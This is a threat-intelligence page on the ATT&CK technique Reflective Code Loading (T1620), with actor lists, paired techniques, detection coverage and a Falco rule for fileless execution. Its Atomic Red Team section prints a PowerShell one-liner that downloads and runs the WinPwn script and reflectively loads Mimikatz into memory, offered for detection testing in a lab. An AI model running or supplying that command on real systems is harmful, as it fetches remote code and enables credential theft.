Home/ATT&CK Technique/Reflective Code Loading
ATT&CK Technique

Reflective Code Loading

T1620 · stealth

Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk (e.g., Shared Modules). Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).

For example, the Assembly.Load() method executed by PowerShell may be abused to load raw code into the running process. Reflective code injection is very similar to Process Injection except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process.

Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.

LinuxmacOSWindows

Actors Using This

14
latin_america_brazilian_organized_cybercrimeAmavaldo
franceAnimal Farm
china_state_sponsored_mandiant_canonical_microsoft_mulberry_typhoonAPT5 (UNC2630 / UNC2717 / Mulberry Typhoon)
russiaAwfulShred
russia_speaking_cybercrime8Base
iran_linked_dragos_tracked_ics_activity_group_cyberav3ngers_persona_2024_disclosedBAUXITE
russia_speaking_cybercrimeBianLian
chinaBillbug
commercial_cybercrime_uefi_bootkitBlackLotus
russia_speaking_organized_cybercrimeBumblebee Operators / EXOTIC LILY
ransomware_raas_independent_emergenceCactus
russia_apt_sandwormCaddyWiper
israel_commercial_cyber_mercenaryCandiru / Sourgum
spainCareto / The Mask

Likely Attack Path

Techniques the same actors pair with this one distinctively - those showing up among actors who use this technique noticeably more than across all actors (lift > 1.15), grouped by kill-chain phase. The × is that lift multiplier; the shared-actor count is in the tooltip. A near-universal technique pairs with everything at baseline, so its list is short by design.
initial-access same
T0865 · Spearphishing Attachment ×2.98T1659 · Content Injection ×2.43
persistence same
T1037.003 · Network Logon Script ×2.98T1547.005 · Security Support Provider ×2.98T1037 · Boot or Logon Initialization Scripts ×2.56T1542.001 · System Firmware ×2.55
privilege-escalation same
T1055.012 · Process Hollowing ×2.98
discovery same
T0846 · Remote System Discovery ×2.64
collection same
T0801 · Monitor Process State ×2.98
impact same
T0813 · Denial of Control ×2.98T1488 · Disk Content Wipe ×2.55
other same
T0881 · Service Stop ×2.98T1027.007 · Dynamic API Resolution ×2.98T1070.002 · Clear Linux or Mac System Logs ×2.64T1036.001 · Invalid Code Signature ×2.41

Atomic Tests

1
Executable Atomic Red Team test cases for exercising this technique in a lab. Copy a command, run it on the listed platform, confirm your detections fire.
powershellwindowsWinPwn - Reflectively load Mimik@tz into memory
Reflectively load Mimik@tz into memory technique via function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
mimiload -consoleoutput -noninteractive

Detection Coverage

2/6 layers
Coverage across standard detection surfaces. Rows marked none have no rule of that type mapped. Some are real blind spots worth closing; others are simply not applicable to this technique (e.g. YARA matches malware files, not network behaviour).
Behavioral / log (Sigma) 2
Analytics (MITRE CAR) none
Runtime / container (Falco) 1
File / malware (YARA) none
Network (Suricata/Snort) none
Vuln scan (Nuclei) none

Falco Runtime Rules

1
Container / Linux runtime detections that fire on this technique.
CRITICALFileless execution via memfd_create
Detect if a binary is executed from memory using the memfd_create technique. This is a well-known defense evasion technique for executing malware on a victim machine without storing the payload on disk and to avoid leaving traces about what has been executed. Adopters can whitelist processes that may use fileless execution for benign purposes by adding items to the list known_memfd_execution_processes.
view condition
spawned_process and proc.is_exe_from_memfd=true and not known_memfd_execution_processes

Comply & Defend

D3FEND2 defensive techniques
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE ATT&CKAtomic Red Teamcar (MITRE)
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin